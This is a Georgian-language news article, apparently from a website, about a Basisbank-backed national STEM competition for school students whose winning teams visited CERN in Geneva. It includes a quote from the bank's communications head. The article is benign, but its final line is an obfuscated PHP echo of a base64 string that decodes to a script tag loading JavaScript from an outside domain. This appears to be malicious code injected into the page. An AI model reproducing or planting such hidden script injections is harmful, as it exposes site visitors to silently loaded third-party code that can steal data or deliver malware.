celsiusi
ავერსი საქკაბელი

 

                    ბაზისბანკის მხარდაჭერით, საქართველოს უნივერსიტეტში, მოსწავლეთა შორის STEM-ის ეროვნული შეჯიბრის ფინალი გაიმართა, რომლის მიზანს მეცნიერების, ტექნოლოგიების, ინჟინერიისა და მათემატიკის განვითარების ხელშეწყობა წარმოადგენდა.

STEM-ის ეროვნულ შეჯიბრში გამარჯვებული პირველი სამი გუნდის წევრები და მათი ხელმძღვანელები, ბაზისბანკის კონტრიბუციით, დაჯილდოვდნენ ჟენევაში მოგზაურობითა და მსოფლიოს ერთ-ერთი უდიდესი ბირთვული კვლევების ევროპული ორგანიზაცია CERN-ში ვიზიტით.

შეჯიბრის გამარჯვებულებს შესაძლებლობა მიეცათ ადგილზე დაეთვალიერებინათ CERN-ის მუზეუმის კაბინეტ-ლაბორატორიები და ქალაქ ჟენევის ღირსშესანიშნაობები.

„ბაზისბანკი აქტიურად არის ჩართული მომავალი მეცნიერების, ტექნოლოგებისა თუ ინჟინრების პროფესიული განვითარების ხელშემწყობ პროექტებში და მოხარული ვარ, რომ ჩვენი მხარდაჭერით STEM-ის ეროვნულ შეჯიბრში გამარჯვებულები ეწვივნენ CERN-ს, პირადად გაეცნენ სამუშაო პროცესს და დაათვალიერეს ორგანიზაციის მუზეუმი. როგორც მაღალი სოციალური პასუხისმგებლობის მქონე ფინანსური ინსტიტუტი, მომავალშიც გავაგრძელებთ ახალგაზრდა თაობის განათლებისა და ინოვაციური აქტივობების მხარდაჭერას.“ - ბაზისბანკის სტრატეგიული კომუნიკაციების დეპარტამენტის უფროსი, თამარ ხადური.

(რ)

375
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");